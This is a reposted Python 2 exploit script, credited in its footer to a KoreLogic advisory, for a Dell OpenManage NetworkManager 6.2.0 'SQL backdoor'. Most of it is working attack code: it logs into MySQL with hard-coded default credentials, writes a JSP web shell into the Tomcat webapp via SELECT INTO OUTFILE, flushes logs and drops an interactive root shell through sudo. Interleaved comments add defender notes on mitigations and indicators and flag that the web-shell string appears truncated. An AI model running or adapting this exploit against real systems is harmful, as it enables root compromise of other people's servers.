[DELL OPEN MANAGER NTW 6.2.0] SQL BACKDOOR [PY] 08/11/18

xB4ckdoorREAL Nov 8th, 2018 (edited) 240 Never
  1. #DISCORD: https://discord.gg/QDy3bUy OR ADD ME ON SKYPE. b4ckdoor.porn
  2. #!/usr/bin/python
  3.  
  4.      # $ python dell-openmanage-networkmanager_rce.py --host 1.3.3.7
  5.      # Dell OpenManage NetworkManager 6.2.0.51 SP3
  6.      # SQL backdoor remote root
  7.      #
  8.      # [-] Starting attack.
  9.      # [+] Connected using root account.
  10.      # [+] Sending malicious SQL.
  11.      # [+] Dropping shell.
  12.      # [-] uid=0(root) gid=0(root) groups=0(root)
  13.      #
  14.      # # uname -a
  15.      # Linux synergy.domain.int 2.6.32-642.6.2.el6.x86_64 #1 SMP Wed Oct 26 06:52:09 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
  16.  
  17.      from optparse import OptionParser
  18.      from string import ascii_letters, digits
  19.      from random import choice
  20.      from re import compile as regex_compile
  21.      from urllib import urlopen
  22.      import pymysql.cursors
  23.  
      # Python 2 script (print statements, xrange, raw_input, urllib.urlopen).
      # Text printed once at start-up by the __main__ block.
      banner = """Dell OpenManage NetworkManager 6.2.0.51 SP3\nSQL backdoor remote root\n"""
      # Hard-coded MySQL account names and the single shared password that the
      # __main__ block tries in order against the target's database service
      # (presumably product-default credentials; the header calls them an
      # "SQL backdoor"). Defender note: the chain only works while these
      # credentials are unchanged and the database listener is reachable from
      # the network, so changing them and restricting the listener are the
      # direct mitigations.
      accounts = ['root','owmeta','oware']
      password = 'dorado'
      # Shape-only check for a dotted-quad IPv4 address: one to three digits
      # per octet, no range validation (999.999.999.999 passes).
      regex = regex_compile("^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$")

      # Absolute path, on the target host, of the JSP file that the __main__
      # block writes with SELECT ... INTO OUTFILE. It lands in the Tomcat
      # 'nvhelp' webapp under a random 8-character alphanumeric file name.
      # Defender note: any unexpected .jsp under this webapps directory is a
      # strong indicator that this technique was used.
      full_path = '/opt/VAroot/dell/openmanage/networkmanager/oware/synergy/tomcat-7.0.40/webapps/nvhelp/%s.jsp' % (''.join(
          [choice(digits + ascii_letters) for i in xrange(8)]))
      # File name only; do_shell() uses it to build the request URL.
      shell_name = full_path.split('/')[-1]
  32.  
      # JSP web shell source. The __main__ block inserts this text into a
      # throw-away MySQL table and writes it to full_path via INTO OUTFILE.
      # Once served by Tomcat, a request carrying a 'cmd' parameter has that
      # value passed unmodified to Runtime.exec(), and the process's stdout is
      # streamed back line by line in the HTTP response.
      # NOTE(review): the closing triple quote of this literal is not visible
      # in this paste; the text appears to have been truncated when re-posted.
      backdoor = """<%@ page import="java.util.*,java.io.*"%>
     <%
     if (request.getParameter("cmd") != null) {
         String m = request.getParameter("cmd");
         Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
         OutputStream os = p.getOutputStream();
         InputStream in = p.getInputStream();
         DataInputStream dis = new DataInputStream(in);
         String disr = dis.readLine();
         while ( disr != null ) {
             out.println(disr);
             disr = dis.readLine();
         }
     }
     %>
  48.  
     def do_shell(ip_address):
         """Interactive loop that relays commands to the planted JSP file.

         Each command is sent as the request body (``cmd=...``; urlopen with a
         data argument issues a POST) to
         ``http://<ip_address>:8080/nvhelp/<shell_name>`` -- the file the
         __main__ block wrote -- and the response body is printed. Every
         command is wrapped in ``sudo sh -c``; the header comment shows this
         yielding ``uid=0(root)`` on the affected install. The loop ends when
         the input contains ``exit`` or ``quit`` (returns False) or on Ctrl-C
         (exits the process).

         Defender note: the traffic is POSTs to a randomly named .jsp under
         /nvhelp/ on port 8080 with a body starting ``cmd=``; the sudo
         invocations by the web service account (presumably the Tomcat user)
         would also be expected to appear in the host's sudo/auth logging.
         """
         # Initial probe: run `id` through the shell and print the result.
         fd = urlopen("http://%s:8080/nvhelp/%s" % (ip_address,shell_name),"cmd=%s" % ('sudo sh -c id'))
         print "[-] %s\n" % fd.read().strip()
         fd.close()
         while True:
             try:
                 # Each typed line is prefixed with sudo before being sent.
                 cmd = 'sudo sh -c %s' % raw_input("# ")
                 # Substring test: any input containing exit/quit ends the loop.
                 if ('exit' in cmd or 'quit' in cmd):
                     break
                 fd = urlopen("http://%s:8080/nvhelp/%s" % (ip_address,shell_name),"cmd=%s" % (cmd))
                 print fd.read().strip()
                 fd.close()
             except KeyboardInterrupt:
                 # Ctrl-C terminates the whole script, not just the loop.
                 print "Exiting."
                 exit(0)
         return False
  65.  
     # Entry point: parse --host, validate its shape, then run the chain
     # (MySQL login with hard-coded credentials -> INTO OUTFILE write of the
     # JSP into the webapp -> interactive do_shell loop).
     if __name__=="__main__":
       print banner
       parser = OptionParser()
       parser.add_option("--host",dest="host",default=None,help="Target IP address")
       o, a = parser.parse_args()
       if o.host is None:
           print "[!] Please provide the required parameters."
           exit(1)
       # Only the dotted-quad shape is checked; hostnames are rejected.
       elif not regex.match(o.host):
           print "[!] --host must contain an IP address."
           exit(1)
       else:
           print "[-] Starting attack."
           try:
               # Try each hard-coded account with the shared password against
               # the target's MySQL service. A connection or authentication
               # failure raises and is handled by the except clause below.
               for user in accounts:
                   conn = pymysql.connect(host=o.host,
                                          user=user,
                                          password=password,
                                          db='mysql',
                                          cursorclass=pymysql.cursors.DictCursor
                                         )
                   # Identity comparison (`is`) between the connection's
                   # recorded user and the loop variable; only then proceeds.
                   if conn.user is user:
                       print "[+] Connected using %s account." % (user)
                       cursor = conn.cursor()
                       print "[+] Sending malicious SQL."
                       # Random table/column names to avoid colliding with
                       # existing objects in the `mysql` schema.
                       table_name = ''.join(
                           [choice(digits + ascii_letters) for i in xrange(8)])
                       column_name = ''.join(
                           [choice(digits + ascii_letters) for i in xrange(8)])
                       cursor.execute('create table %s (%s text)' % (table_name, column_name))
                       # The JSP source becomes the single row of the table.
                       cursor.execute("insert into %s (%s) values ('%s')" % (table_name, column_name, backdoor))
                       conn.commit()
                       # INTO OUTFILE makes the server write the row -- i.e. the
                       # JSP text -- to full_path on the database host; `escaped
                       # by ""` suppresses escape characters in the output.
                       # This requires the FILE privilege and a secure_file_priv
                       # setting that permits that directory. Defender note:
                       # pointing secure_file_priv at a dedicated directory (or
                       # disabling it) blocks this step regardless of
                       # credentials, and the CREATE TABLE / INTO OUTFILE /
                       # DROP TABLE sequence against the `mysql` schema is
                       # visible in the general query log or an audit plugin.
                       cursor.execute('select * from %s into outfile "%s" fields escaped by ""' % (table_name,full_path))
                       cursor.execute('drop table if exists `%s`' % (table_name))
                       conn.commit()
                       # Rotates the server's log files. NOTE(review): purpose
                       # is not stated; the rotation itself is an observable
                       # server event.
                       cursor.execute('flush logs')
                       print "[+] Dropping shell."
                       do_shell(o.host)
                       # Stop after the first account that succeeds.
                       break
           except Exception as e:
               # 1045 is MySQL's access-denied error code.
               if e[0] == '1045':
                   print "[!] Hardcoded SQL credentials failed." % (e)
               else:
                   print "[!] Could not execute attack. Reason: %s." % (e)
               exit(0)
  111.  
  112. ###############################################################################################################
  113. The contents of this advisory are copyright(c) 2018
  114. KoreLogic, Inc. and are licensed under a Creative Commons
  115. Attribution Share-Alike 4.0 (United States) License:
  116. http://creativecommons.org/licenses/by-sa/4.0/
  117.  
  118. #  [2018-11-08]  #